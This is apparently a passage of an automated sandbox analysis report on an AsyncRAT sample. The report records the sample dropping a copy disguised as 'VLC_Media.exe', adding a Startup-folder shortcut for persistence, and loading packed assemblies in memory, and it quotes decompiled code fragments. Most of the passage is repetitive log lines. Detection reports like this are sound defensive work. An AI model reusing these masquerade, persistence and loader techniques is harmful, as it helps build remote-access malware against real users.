                            Source: C:\Users\user\Desktop\18fvs4AVae.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                            Source: VLC_Media.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\ProgramData\VLC_Media.exe
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: 18fvs4AVae.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: 18fvs4AVae.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Data Obfuscation

                            barindex
                            .NET source code contains method to dynamically call methods (often used by packers)
                            Source: 18fvs4AVae.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 18fvs4AVae.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 18fvs4AVae.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: VLC_Media.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: VLC_Media.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: VLC_Media.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                            .NET source code contains potential unpacker
                            Source: 18fvs4AVae.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                            Source: 18fvs4AVae.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                            Source: 18fvs4AVae.exe, Messages.cs.Net Code: Memory
                            Source: VLC_Media.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                            Source: VLC_Media.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                            Source: VLC_Media.exe.0.dr, Messages.cs.Net Code: Memory
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B76D2A5 pushad ; iretd 1_2_00007FFD9B76D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B952316 push 8B485F94h; iretd 1_2_00007FFD9B95231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B77D2A5 pushad ; iretd 4_2_00007FFD9B77D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B890FFA push E85E51FBh; ret 4_2_00007FFD9B8910F9
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8910FA push E85E51FBh; ret 4_2_00007FFD9B8910F9
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B967F5F push ecx; iretd 4_2_00007FFD9B967F61
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B962316 push 8B485F93h; iretd 4_2_00007FFD9B96231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B79D2A5 pushad ; iretd 9_2_00007FFD9B79D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B982316 push 8B485F91h; iretd 9_2_00007FFD9B98231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B78D2A5 pushad ; iretd 11_2_00007FFD9B78D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B979B7A push 9000009Bh; retf 11_2_00007FFD9B979BC1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B972316 push 8B485F92h; iretd 11_2_00007FFD9B97231B
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeFile created: C:\ProgramData\VLC_Media.exeJump to dropped file
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeFile created: C:\ProgramData\VLC_Media.exeJump to dropped file

                            Boot Survival

                            barindex
                            Yara detected AsyncRAT
                            Source: Yara matchFile source: 18fvs4AVae.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.18fvs4AVae.exe.480000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\VLC_Media.exe, type: DROPPED
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VLC_Media.lnkJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VLC_Media.lnkJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Loading BitLocker PowerShell Module
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
